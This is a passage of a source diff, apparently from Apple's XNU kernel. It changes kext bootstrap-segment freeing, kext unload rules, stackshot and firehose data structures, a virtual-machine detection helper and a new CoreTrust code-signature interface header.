+       // We have the manifest in the boot_args, create IOMemoryDescriptor for the blob
+       IOAddressRange ranges;
+       ranges.address = args->bsARVManifestStart;
+       ranges.length = args->bsARVManifestSize;
+
+       const IOOptionBits options = kIODirectionInOut | kIOMemoryTypePhysical64 | kIOMemoryMapperNone;
+
+       IOMemoryDescriptor* memoryDescriptor = IOMemoryDescriptor::withOptions(&ranges, 1, 0, NULL, options);
+       DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor);
+       return memoryDescriptor;
+}
index ac67b43b553c8d26d1dd0e23da2800bdad2e7d80..7624171d6cafadf13606fea19b2a3c00640a3e05 100644 (file)
@@ -738,6 +738,6 @@ sysctl_iokittest(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused
 }
 
 SYSCTL_PROC(_kern, OID_AUTO, iokittest,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_iokittest, "I", "");
 #endif // __clang_analyzer__
index 8205d93bc8535b1efbf8ae5bf5db45255e180b2c..e2769e31b310ca04121986e117514458ddb94a5a 100644 (file)
@@ -55,6 +55,8 @@ extern dev_t mdevlookup(int devid);
 extern void mdevremoveall(void);
 extern int mdevgetrange(int devid, uint64_t *base, uint64_t *size);
 extern void di_root_ramfile(IORegistryEntry * entry);
+extern int IODTGetDefault(const char *key, void *infoAddr, unsigned int infoSize);
+extern boolean_t cpuid_vmm_present(void);
 
 #define ROUNDUP(a, b) (((a) + ((b) - 1)) & (~((b) - 1)))
 
@@ -544,6 +546,26 @@ do_reboot:
        return true;
 }
 
+int
+IOGetVMMPresent(void)
+{
+       int hv_vmm_present = 0;
+
+#if defined(__arm64__)
+       if (IODTGetDefault("vmm-present", &hv_vmm_present, sizeof(hv_vmm_present)) < 0) {
+               return 0;
+       }
+
+       if (hv_vmm_present != 0) {
+               hv_vmm_present = 1;
+       }
+#elif defined(__x86_64__)
+       hv_vmm_present = cpuid_vmm_present();
+#endif
+
+       return hv_vmm_present;
+}
+
 kern_return_t
 IOFindBSDRoot( char * rootName, unsigned int rootNameSize,
     dev_t * root, u_int32_t * oflags )
index f2eaf624cbea7198077c96f2a903a4a4c69bac08..d57bd0c27ef979ff79b0014f49f8d6993e024da1 100644 (file)
@@ -492,7 +492,7 @@ struct kcdata_type_definition {
 #define STACKSHOT_KCTYPE_TASK_SNAPSHOT               0x905u /* task_snapshot_v2 */
 #define STACKSHOT_KCTYPE_THREAD_SNAPSHOT             0x906u /* thread_snapshot_v2, thread_snapshot_v3 */
 #define STACKSHOT_KCTYPE_DONATING_PIDS               0x907u /* int[] */
-#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO        0x908u /* same as KCDATA_TYPE_LIBRARY_LOADINFO64 */
+#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO        0x908u /* dyld_shared_cache_loadinfo */
 #define STACKSHOT_KCTYPE_THREAD_NAME                 0x909u /* char[] */
 #define STACKSHOT_KCTYPE_KERN_STACKFRAME             0x90Au /* struct stack_snapshot_frame32 */
 #define STACKSHOT_KCTYPE_KERN_STACKFRAME64           0x90Bu /* struct stack_snapshot_frame64 */
@@ -556,17 +556,42 @@ struct dyld_uuid_info_64 {
        uuid_t   imageUUID;
 };
 
+/*
+ * N.B.: Newer kernels output dyld_shared_cache_loadinfo structures
+ * instead of this, since the field names match their contents better.
+ */
 struct dyld_uuid_info_64_v2 {
        uint64_t imageLoadAddress; /* XXX image slide */
        uuid_t   imageUUID;
        /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */
-       uint64_t imageSlidBaseAddress; /* slid base address of image */
+       uint64_t imageSlidBaseAddress; /* slid base address or slid first mapping of image */
+};
+
+/*
+ * This is the renamed version of dyld_uuid_info_64 with more accurate
+ * field names, for STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO.  Any users
+ * must be aware of the dyld_uuid_info_64* version history and ensure
+ * the fields they are accessing are within the actual bounds.
+ *
+ * OLD_FIELD              NEW_FIELD
+ * imageLoadAddress       sharedCacheSlide
+ * imageUUID              sharedCacheUUID
+ * imageSlidBaseAddress   sharedCacheUnreliableSlidBaseAddress
+ * -                      sharedCacheSlidFirstMapping
+ */
+struct dyld_shared_cache_loadinfo {
+       uint64_t sharedCacheSlide;      /* image slide value */
+       uuid_t   sharedCacheUUID;
+       /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */
+       uint64_t sharedCacheUnreliableSlidBaseAddress;  /* for backwards-compatibility; use sharedCacheSlidFirstMapping if available */
+       /* end of version 2 of dyld_uuid_info_64. sizeof v2 was 32 */
+       uint64_t sharedCacheSlidFirstMapping; /* slid base address of first mapping */
 };
 
 struct dyld_aot_cache_uuid_info {
-       uint64_t x86SlidBaseAddress; /* slid base address of x86 shared cache */
+       uint64_t x86SlidBaseAddress; /* slid first mapping address of x86 shared cache */
        uuid_t x86UUID; /* UUID of x86 shared cache */
-       uint64_t aotSlidBaseAddress; /* slide base address of aot cache */
+       uint64_t aotSlidBaseAddress; /* slide first mapping address of aot cache */
        uuid_t aotUUID; /* UUID of aot shared cache */
 };
 
@@ -618,6 +643,9 @@ enum task_snapshot_flags {
        kTaskIsDirtyTracked                   = 0x4000000,
        kTaskAllowIdleExit                    = 0x8000000,
        kTaskIsTranslated                     = 0x10000000,
+       kTaskSharedRegionNone                 = 0x20000000,     /* task doesn't have a shared region */
+       kTaskSharedRegionSystem               = 0x40000000,     /* task is attached to system shared region */
+       kTaskSharedRegionOther                = 0x80000000,     /* task is attached to a different shared region */
 };
 
 enum thread_snapshot_flags {
@@ -876,6 +904,12 @@ struct stackshot_duration {
        uint64_t stackshot_duration_outer;
 } __attribute__((packed));
 
+struct stackshot_duration_v2 {
+       uint64_t stackshot_duration;
+       uint64_t stackshot_duration_outer;
+       uint64_t stackshot_duration_prior;
+} __attribute__((packed));
+
 struct stackshot_fault_stats {
        uint32_t sfs_pages_faulted_in;      /* number of pages faulted in using KDP fault path */
        uint64_t sfs_time_spent_faulting;   /* MATUs spent faulting */
index cca45ba6c6f7412c1e56a4f5b517141400b4a19a..11d38b06898557dc6fcd31ad21e40525aa204446 100644 (file)
@@ -157,9 +157,14 @@ kcdata_get_typedescription(unsigned type_id, uint8_t * buffer, uint32_t buffer_s
 
        case STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO: {
                i = 0;
+               /*
+                * for backwards compatibility, we keep the old field names, but the
+                * new data is being put in dyld_shared_cache_loadinfo
+                */
                _SUBTYPE(KC_ST_UINT64, struct dyld_uuid_info_64_v2, imageLoadAddress);
                _SUBTYPE_ARRAY(KC_ST_UINT8, struct dyld_uuid_info_64_v2, imageUUID, 16);
                _SUBTYPE(KC_ST_UINT64, struct dyld_uuid_info_64_v2, imageSlidBaseAddress);
+               _SUBTYPE(KC_ST_UINT64, struct dyld_shared_cache_loadinfo, sharedCacheSlidFirstMapping);
                setup_type_definition(retval, type_id, i, "shared_cache_dyld_load_info");
                break;
        }
@@ -546,10 +551,12 @@ kcdata_get_typedescription(unsigned type_id, uint8_t * buffer, uint32_t buffer_s
 
        case STACKSHOT_KCTYPE_STACKSHOT_DURATION: {
                i = 0;
-               _SUBTYPE(KC_ST_UINT64, struct stackshot_duration, stackshot_duration);
-               _SUBTYPE(KC_ST_UINT64, struct stackshot_duration, stackshot_duration_outer);
+               _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration);
+               _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration_outer);
+               _SUBTYPE(KC_ST_UINT64, struct stackshot_duration_v2, stackshot_duration_prior);
                subtypes[0].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE;
                subtypes[1].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE;
+               subtypes[2].kcs_flags |= KCS_SUBTYPE_FLAGS_MERGE;
                setup_type_definition(retval, type_id, i, "stackshot_duration");
                break;
        }
index 8b7c090e35ac80810187351efd7822c879e7302f..009375baa2696d045cab3a3af590b7187b12569e 100644 (file)
@@ -975,7 +975,9 @@ OSKext::removeKextBootstrap(void)
        int                        dt_symtab_size        = 0;
        int                        dt_result             = 0;
 
-       kernel_segment_command_t * seg_to_remove         = NULL;
+       kernel_segment_command_t * seg_kld               = NULL;
+       kernel_segment_command_t * seg_klddata           = NULL;
+       kernel_segment_command_t * seg_linkedit          = NULL;
 
        const char __unused      * dt_segment_name       = NULL;
        void       __unused      * segment_paddress      = NULL;
@@ -1015,42 +1017,60 @@ OSKext::removeKextBootstrap(void)
        }
 
        /*****
-        * KLD bootstrap segment.
+        * KLD & KLDDATA bootstrap segments.
         */
        // xxx - should rename KLD segment
-       seg_to_remove = getsegbyname("__KLD");
-       if (seg_to_remove) {
-               OSRuntimeUnloadCPPForSegment(seg_to_remove);
+       seg_kld = getsegbyname("__KLD");
+       seg_klddata = getsegbyname("__KLDDATA");
+       if (seg_klddata) {
+               // __mod_term_func is part of __KLDDATA
+               OSRuntimeUnloadCPPForSegment(seg_klddata);
        }
 
 #if __arm__ || __arm64__
-       /* Free the memory that was set up by bootx.
+       /* Free the memory that was set up by iBoot.
+        */
+#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR)
+       /* We cannot free the KLD segment with CTRR enabled as it contains text and
+        * is covered by the contiguous rorgn.
         */
        dt_segment_name = "Kernel-__KLD";
        if (0 == IODTGetLoaderInfo(dt_segment_name, &segment_paddress, &segment_size)) {
-               /* We cannot free this with KTRR enabled, as we cannot
-                * update the permissions on the KLD range this late
-                * in the boot process.
-                */
                IODTFreeLoaderInfo(dt_segment_name, (void *)segment_paddress,
-                   (int)segment_size);
+                   (int)segment_size); // calls ml_static_mfree
+       } else if (seg_kld && seg_kld->vmaddr && seg_kld->vmsize) {
+               /* With fileset KCs, the Kernel KLD segment is not recorded in the DT. */
+               ml_static_mfree(ml_static_ptovirt(seg_kld->vmaddr - gVirtBase + gPhysBase),
+                   seg_kld->vmsize);
+       }
+#endif
+       dt_segment_name = "Kernel-__KLDDATA";
+       if (0 == IODTGetLoaderInfo(dt_segment_name, &segment_paddress, &segment_size)) {
+               IODTFreeLoaderInfo(dt_segment_name, (void *)segment_paddress,
+                   (int)segment_size);  // calls ml_static_mfree
+       } else if (seg_klddata && seg_klddata->vmaddr && seg_klddata->vmsize) {
+               /* With fileset KCs, the Kernel KLDDATA segment is not recorded in the DT. */
+               ml_static_mfree(ml_static_ptovirt(seg_klddata->vmaddr - gVirtBase + gPhysBase),
+                   seg_klddata->vmsize);
        }
 #elif __i386__ || __x86_64__
        /* On x86, use the mapping data from the segment load command to
-        * unload KLD directly.
+        * unload KLD & KLDDATA directly.
         * This may invalidate any assumptions about  "avail_start"
         * defining the lower bound for valid physical addresses.
         */
-       if (seg_to_remove && seg_to_remove->vmaddr && seg_to_remove->vmsize) {
-               bzero((void *)seg_to_remove->vmaddr, seg_to_remove->vmsize);
-               ml_static_mfree(seg_to_remove->vmaddr, seg_to_remove->vmsize);
+       if (seg_kld && seg_kld->vmaddr && seg_kld->vmsize) {
+               bzero((void *)seg_kld->vmaddr, seg_kld->vmsize);
+               ml_static_mfree(seg_kld->vmaddr, seg_kld->vmsize);
+       }
+       if (seg_klddata && seg_klddata->vmaddr && seg_klddata->vmsize) {
+               bzero((void *)seg_klddata->vmaddr, seg_klddata->vmsize);
+               ml_static_mfree(seg_klddata->vmaddr, seg_klddata->vmsize);
        }
 #else
 #error arch
 #endif
 
-       seg_to_remove = NULL;
-
        /*****
         * Prelinked kernel's symtab (if there is one).
         */
@@ -1062,7 +1082,7 @@ OSKext::removeKextBootstrap(void)
                }
        }
 
-       seg_to_remove = (kernel_segment_command_t *)getsegbyname("__LINKEDIT");
+       seg_linkedit = (kernel_segment_command_t *)getsegbyname("__LINKEDIT");
 
        /* kxld always needs the kernel's __LINKEDIT segment, but we can make it
         * pageable, unless keepsyms is set.  To do that, we have to copy it from
@@ -1084,9 +1104,9 @@ OSKext::removeKextBootstrap(void)
                vm_map_offset_t seg_copy_offset = 0;
                vm_map_size_t seg_length = 0;
 
-               seg_data = (void *) seg_to_remove->vmaddr;
-               seg_offset = (vm_map_offset_t) seg_to_remove->vmaddr;
-               seg_length = (vm_map_size_t) seg_to_remove->vmsize;
+               seg_data = (void *) seg_linkedit->vmaddr;
+               seg_offset = (vm_map_offset_t) seg_linkedit->vmaddr;
+               seg_length = (vm_map_size_t) seg_linkedit->vmsize;
 
                /* Allocate space for the LINKEDIT copy.
                 */
@@ -1169,8 +1189,6 @@ OSKext::removeKextBootstrap(void)
        }
 #endif // VM_MAPPED_KEXTS
 
-       seg_to_remove = NULL;
-
        result = kOSReturnSuccess;
 
        return result;
@@ -1590,7 +1608,7 @@ bool
 OSKext::setAutounloadEnabled(bool flag)
 {
        bool result = flags.autounloadEnabled ? true : false;
-       flags.autounloadEnabled = flag ? 1 : 0;
+       flags.autounloadEnabled = flag ? (0 == flags.unloadUnsupported) : 0;
 
        if (result != (flag ? true : false)) {
                OSKextLog(this,
@@ -1891,6 +1909,8 @@ OSKext::initWithPrelinkedInfoDict(
                                getPropertyForHostArch(kOSBundleAllowUserLoadKey) == kOSBooleanTrue);
                        if (shouldSaveSegments) {
                                flags.resetSegmentsFromImmutableCopy = 1;
+                       } else {
+                               flags.unloadUnsupported = 1;
                        }
                        break;
                case KCKindPageable:
@@ -1901,6 +1921,8 @@ OSKext::initWithPrelinkedInfoDict(
                                flags.resetSegmentsFromImmutableCopy = 1;
                        } else if (resetAuxKCSegmentOnUnload) {
                                flags.resetSegmentsFromVnode = 1;
+                       } else {
+                               flags.unloadUnsupported = 1;
                        }
                        break;
                default:
@@ -4084,6 +4106,15 @@ OSKext::removeKext(
                if (aKext->countRequestCallbacks()) {
                        goto finish;
                }
+               if (aKext->flags.unloadUnsupported) {
+                       result = kOSKextReturnInUse;
+                       OSKextLog(aKext,
+                           kOSKextLogErrorLevel |
+                           kOSKextLogKextBookkeepingFlag,
+                           "Can't remove kext %s; unsupported by cache.",
+                           aKext->getIdentifierCString());
+                       goto finish;
+               }
 
                /* If we are terminating, send the request to the IOCatalogue
                 * (which will actually call us right back but that's ok we have
@@ -8978,7 +9009,7 @@ OSKext::addClass(
                                    getIdentifierCString(),
                                    aClass->getClassName());
 
-                               flags.autounloadEnabled = 1;
+                               flags.autounloadEnabled = (0 == flags.unloadUnsupported);
                                break;
                        }
                }
@@ -11829,6 +11860,24 @@ OSKext::loadFileSetKexts(OSDictionary * requestDict __unused)
        allow_fileset_load = false;
 #endif
 
+       /*
+        * Change with 70582300
+        */
+#if 0 || !defined(VM_MAPPED_KEXTS)
+       /*
+        * On platforms that don't support the SystemKC or a file-backed
+        * AuxKC, the kext receipt for 3rd party kexts loaded by the booter
+        * needs to be queried before we load any codeless kexts or release
+        * any 3rd party kexts to run. On platforms that support a file-backed
+        * AuxKC, this process is done via the kext audit mechanism.
+        */
+
+       printf("KextLog: waiting for kext receipt to be queried.\n");
+       while (!IOServiceWaitForMatchingResource(kOSKextReceiptQueried, UINT64_MAX)) {
+               IOSleep(30);
+       }
+#endif /* !VM_MAPPED_KEXTS */
+
        /*
         * Get the args from the request. Right now we need the file
         * name for the pageable and the aux kext collection file sets.
@@ -11910,6 +11959,21 @@ try_auxkc:
                OSDictionary          *infoDict;
                parsedXML = consumeDeferredKextCollection(KCKindAuxiliary);
                infoDict = OSDynamicCast(OSDictionary, parsedXML.get());
+#if !defined(VM_MAPPED_KEXTS)
+               /*
+                * On platforms where we don't dynamically wire-down / page-in
+                * kext memory, we need to maintain the invariant that if the
+                * AuxKC in memory does not contain a kext receipt, then we
+                * should not load any of the kexts.
+                */
+               size_t receipt_sz = 0;
+               if (getsectdatafromheader(akc_mh, kReceiptInfoSegment, kAuxKCReceiptSection, &receipt_sz) == NULL || receipt_sz == 0) {
+                       OSKextLog(/* kext */ NULL, kOSKextLogErrorLevel | kOSKextLogArchiveFlag,
+                           "KextLog: WARNING: Failed to load AuxKC from memory: missing receipt");
+                       ret = kOSKextReturnKCLoadFailure;
+                       goto try_codeless;
+               }
+#endif
                if (infoDict) {
                        bool added;
                        printf("KextLog: Adding kexts from in-memory AuxKC\n");
@@ -15251,6 +15315,17 @@ OSKextSavedMutableSegment::restoreContents(kernel_segment_command_t *seg)
        return kOSReturnSuccess;
 }
 
+extern "C" kern_return_t
+OSKextSetReceiptQueried(void)
+{
+       OSKextLog(/* kext */ NULL,
+           kOSKextLogStepLevel | kOSKextLogGeneralFlag,
+           "Setting kext receipt as queried");
+
+       IOService::publishResource(kOSKextReceiptQueried, kOSBooleanTrue);
+       return KERN_SUCCESS;
+}
+
 extern "C" const vm_allocation_site_t *
 OSKextGetAllocationSiteForCaller(uintptr_t address)
 {
index 40bd13b6fea0bbd3e13c773b82e3a92ee7c90fe6..de210c18afd7cb46b9de20c31c06bed2986544d1 100644 (file)
@@ -330,7 +330,14 @@ finish:
 }
 
 #if defined(HAS_APPLE_PAC)
-static inline void
+#if !KASAN
+/*
+ * Place this function in __KLD,__text on non-kasan builds so it gets unmapped
+ * after CTRR lockdown.
+ */
+__attribute__((noinline, section("__KLD,__text")))
+#endif
+static void
 OSRuntimeSignStructorsInSegment(kernel_segment_command_t *segment)
 {
        kernel_section_t         * section;
index e5b444617afdf6e9ffeb96f4d4ae2eed4e30785c..0ffca5b4f2b880cb5c6189d14b8b249adfb6386f 100644 (file)
@@ -55,6 +55,8 @@ libkern/stdio/scanf.c                                 standard
 libkern/uuid/uuid.c                                    standard
 
 libkern/os/log.c                                       standard
+libkern/os/log_encode.c                                        standard
+libkern/os/log_mem.c                                   standard
 libkern/os/object.c                                    standard
 libkern/os/internal.c                                  standard
 libkern/os/refcnt.c                                    standard
@@ -96,6 +98,8 @@ libkern/crypto/corecrypto_rand.c              optional crypto
 libkern/crypto/corecrypto_rsa.c                    optional crypto
 libkern/crypto/corecrypto_chacha20poly1305.c   optional        crypto
 
+libkern/coretrust/coretrust.c   standard
+
 libkern/img4/interface.c               standard
 
 libkern/stack_protector.c       standard
diff --git a/libkern/coretrust/coretrust.c b/libkern/coretrust/coretrust.c
new file mode 100644 (file)
index 0000000..4a8f08b
--- /dev/null
@@ -0,0 +1,18 @@
+#include <libkern/libkern.h>
+#include <libkern/section_keywords.h>
+#include <libkern/coretrust/coretrust.h>
+
+#if defined(SECURITY_READ_ONLY_LATE)
+SECURITY_READ_ONLY_LATE(const coretrust_t *) coretrust = NULL;
+#else
+const coretrust_t *coretrust = NULL;
+#endif
+
+void
+coretrust_interface_register(const coretrust_t *ct)
+{
+       if (coretrust) {
+               panic("coretrust interface already set");
+       }
+       coretrust = ct;
+}
index ac3fbe92efdf81560c39bbb7b8bcdabe39835852..513fd208296d288173695c800e102a54ccf1cc3e 100644 (file)
@@ -64,6 +64,7 @@ typedef struct firehose_chunk_range_s {
        uint16_t fcr_length;
 } *firehose_chunk_range_t;
 
+#if __has_include(<os/atomic_private.h>)
 #if defined(KERNEL) || defined(OS_FIREHOSE_SPI)
 
 OS_ALWAYS_INLINE
@@ -181,6 +182,7 @@ firehose_chunk_tracepoint_end(firehose_chunk_t fc,
 #endif // OS_ATOMIC_HAS_STARVATION_FREE_RMW || !OS_ATOMIC_CONFIG_STARVATION_FREE_ONLY
 
 #endif // defined(KERNEL) || defined(OS_FIREHOSE_SPI)
+#endif // __has_include(<os/atomic_private.h>)
 
 __END_DECLS
 
index 27fef14484d27a7d7a8561bc526d9fa804ab327f..9770351bf0c11cc1d5d92c4a57eb8615b385de75 100644 (file)
@@ -78,6 +78,7 @@ OS_ENUM(firehose_stream, uint8_t,
     firehose_stream_memory_baseband             = 6,
 
     _firehose_stream_max,
+    _firehose_stream_disabled = (uint8_t)-1,
     );
 
 /*!
@@ -131,9 +132,10 @@ OS_OPTIONS(firehose_tracepoint_flags, uint16_t,
         _firehose_tracepoint_flags_pc_style_main_plugin         = 0x0003 << 1,
         _firehose_tracepoint_flags_pc_style_absolute            = 0x0004 << 1,
         _firehose_tracepoint_flags_pc_style_uuid_relative       = 0x0005 << 1,
-        _firehose_tracepoint_flags_pc_style__unused6            = 0x0006 << 1,
+        _firehose_tracepoint_flags_pc_style_large_shared_cache  = 0x0006 << 1,
         _firehose_tracepoint_flags_pc_style__unused7            = 0x0007 << 1,
         _firehose_tracepoint_flags_base_has_unique_pid          = 0x0010,
+        _firehose_tracepoint_flags_base_has_large_offset        = 0x0020,
     );
 
 /*
@@ -264,14 +266,18 @@ OS_ENUM(_firehose_tracepoint_type_signpost, firehose_tracepoint_type_t,
  * @abstract
  * Flags for Log tracepoints (namespace signpost).
  *
- * When flags are shared with the log type, they should havethe same values.
+ * When flags are shared with the log type, they should have the same values.
  */
 OS_OPTIONS(_firehose_tracepoint_flags_signpost, uint16_t,
+    // shared with log
     _firehose_tracepoint_flags_signpost_has_private_data    = 0x0100,
     _firehose_tracepoint_flags_signpost_has_subsystem       = 0x0200,
     _firehose_tracepoint_flags_signpost_has_rules           = 0x0400,
     _firehose_tracepoint_flags_signpost_has_oversize        = 0x0800,
     _firehose_tracepoint_flags_signpost_has_context_data    = 0x1000,
+
+    // specific to signpost
+    _firehose_tracepoint_flags_signpost_has_name            = 0x8000,
     );
 
 /* MIG firehose push reply structure */
index 69c04c982b3bcf6ebf4fac5e9f984ea96ab7c999..70c24872267686a6ba8d64620f89d3744bb3e46e 100644 (file)
 #if KERNEL
 #include <atm/atm_internal.h>
 #endif
+#if __has_include(<os/atomic_private.h>)
 #include <os/atomic_private.h>
+#else
+#include <os/internal/internal_shared.h>
+#endif
 #include "firehose_types_private.h"
 
 OS_ASSUME_NONNULL_BEGIN
index 3f78b8f25b537b0648aa5af94f79fb76e9b94e33..c7b51b5e61b6df2829103ea8d95fbc5d8871c2fb 100644 (file)
@@ -10,7 +10,8 @@ INSTINC_SUBDIRS = \
     machine \
     c++ \
     crypto \
-    img4
+    img4 \
+       coretrust
 INSTINC_SUBDIRS_X86_64 = \
         i386
 INSTINC_SUBDIRS_X86_64H = \
index 6297be81cdbd9671f862936209603a3e2fa8fa96..90d7aaede4ec2f3f57631dfb68affd65fbaf9cb8 100644 (file)
@@ -786,6 +786,12 @@ void kext_dump_panic_lists(int (*printf_func)(const char *fmt, ...));
 
 #ifdef XNU_KERNEL_PRIVATE
 
+/*!
+ * @define kOSKextReceiptQueried
+ * @abstract Whether or not the kext receipt has been successfully loaded.
+ */
+#define kOSKextReceiptQueried  "OSKextReceiptQueried"
+
 #if PRAGMA_MARK
 #pragma mark -
 /********************************************************************/
@@ -981,6 +987,7 @@ extern const vm_allocation_site_t * OSKextGetAllocationSiteForCaller(uintptr_t a
 extern uint32_t                     OSKextGetKmodIDForSite(const vm_allocation_site_t * site,
     char * name, vm_size_t namelen);
 extern void                         OSKextFreeSite(vm_allocation_site_t * site);
+extern kern_return_t                OSKextSetReceiptQueried(void);
 
 #if CONFIG_IMAGEBOOT
 extern int OSKextGetUUIDForName(const char *, uuid_t);
index aff03853347308737203962442ab9f5c89d108f5..cc456e2541b0f0040e88d59b246ee07a2dee2e55 100644 (file)
@@ -315,6 +315,7 @@ private:
                unsigned int CPPInitialized:1;
                unsigned int jettisonLinkeditSeg:1;
                unsigned int resetSegmentsFromImmutableCopy:1;
+               unsigned int unloadUnsupported:1;
        } flags;
 
        uint32_t matchingRefCount;
index c8cd5025fa5e764b4ccfc8cff5ceb3cba5e9d57f..463eb6a89ff352bcb22a1ae2744132bb91a96271 100644 (file)
@@ -117,12 +117,12 @@ protected:
 
        unsigned int   flags:14,
            length:18;
-       char         * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;;
+       char         * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;
 
 #else /* APPLE_KEXT_ALIGN_CONTAINERS */
 
 protected:
-       char         * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;;
+       char         * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;
        unsigned int   flags;
        unsigned int   length;
 
diff --git a/libkern/libkern/coretrust/Makefile b/libkern/libkern/coretrust/Makefile
new file mode 100644 (file)
index 0000000..8faf50f
--- /dev/null
@@ -0,0 +1,24 @@
+export MakeInc_cmd=${SRCROOT}/makedefs/MakeInc.cmd
+export MakeInc_def=${SRCROOT}/makedefs/MakeInc.def
+export MakeInc_rule=${SRCROOT}/makedefs/MakeInc.rule
+export MakeInc_dir=${SRCROOT}/makedefs/MakeInc.dir
+
+include $(MakeInc_cmd)
+include $(MakeInc_def)
+
+DATAFILES =
+PRIVATE_DATAFILES =
+KERNELFILES =
+PRIVATE_KERNELFILES = coretrust.h
+
+INSTALL_MI_LIST = ${DATAFILES}
+INSTALL_MI_LCL_LIST = ${PRIVATE_DATAFILES}
+INSTALL_KF_MI_LIST = ${KERNELFILES}
+INSTALL_KF_MI_LCL_LIST = ${PRIVATE_KERNELFILES}
+EXPORT_MI_LIST = ${INSTALL_KF_MI_LCL_LIST}
+
+INSTALL_MI_DIR = libkern/coretrust
+EXPORT_MI_DIR = libkern/coretrust
+
+include $(MakeInc_rule)
+include $(MakeInc_dir)
\ No newline at end of file
diff --git a/libkern/libkern/coretrust/coretrust.h b/libkern/libkern/coretrust/coretrust.h
new file mode 100644 (file)
index 0000000..dafe3db
--- /dev/null
@@ -0,0 +1,93 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#ifndef __CORETRUST_H
+#define __CORETRUST_H
+
+#include <os/base.h>
+#include <sys/cdefs.h>
+#include <sys/types.h>
+
+#if XNU_KERNEL_PRIVATE
+/*
+ * Only include this when building for XNU. CoreTrust will include its
+ * local copy of the header.
+ */
+#include <coretrust/CTEvaluate.h>
+#endif
+
+/*
+ * We add more definitions as the need for them arises. Please refer
+ * to <coretrust/CTEvaluate.h> for more information.
+ */
+
+typedef int (*coretrust_CTEvaluateAMFICodeSignatureCMS_t)(
+       const uint8_t *cms_data,
+       size_t cms_data_length,
+       const uint8_t *detached_data,
+       size_t detached_data_length,
+       bool allow_test_hierarchy,
+       const uint8_t **leaf_certificate,
+       size_t *leaf_certificate_length,
+       CoreTrustPolicyFlags *policy_flags,
+       CoreTrustDigestType *cms_digest_type,
+       CoreTrustDigestType *hash_agility_digest_type,
+       const uint8_t **digest_data,
+       size_t *digest_length
+       );
+
+typedef struct _coretrust {
+       coretrust_CTEvaluateAMFICodeSignatureCMS_t CTEvaluateAMFICodeSignatureCMS;
+} coretrust_t;
+
+__BEGIN_DECLS
+
+/*!
+ * @const coretrust
+ * The CoreTrust interface that was registered.
+ */
+extern const coretrust_t *coretrust;
+
+/*!
+ * @function coretrust_interface_register
+ * Registers the CoreTrust kext interface for use within the kernel proper.
+ *
+ * @param ct
+ * The interface to register.
+ *
+ * @discussion
+ * This routine may only be called once and must be called before late-const has
+ * been applied to kernel memory.
+ */
+OS_EXPORT OS_NONNULL1
+void
+coretrust_interface_register(const coretrust_t *ct);
+
+__END_DECLS
+
+#endif // __CORETRUST_H
index 765b93320b8a7f21c435318f96437c43005889d9..5aa469babb0a8a55c80f0c2db24c7f94b437149c 100644 (file)
  */
 #if __has_feature(ptrauth_calls)
 ptrauth_generic_signature_t
-ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags);
+ptrauth_utils_sign_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags);
 #else
 static inline ptrauth_generic_signature_t
-ptrauth_utils_sign_blob_generic(__unused void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags)
+ptrauth_utils_sign_blob_generic(__unused const void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags)
 {
        return 0;
 }
@@ -89,10 +89,10 @@ ptrauth_utils_sign_blob_generic(__unused void * ptr, __unused size_t len_bytes,
  */
 #if __has_feature(ptrauth_calls)
 void
-ptrauth_utils_auth_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature);
+ptrauth_utils_auth_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature);
 #else
 static inline void
-ptrauth_utils_auth_blob_generic(__unused void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags, __unused ptrauth_generic_signature_t signature)
+ptrauth_utils_auth_blob_generic(__unused const void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags, __unused ptrauth_generic_signature_t signature)
 {
        return;
 }
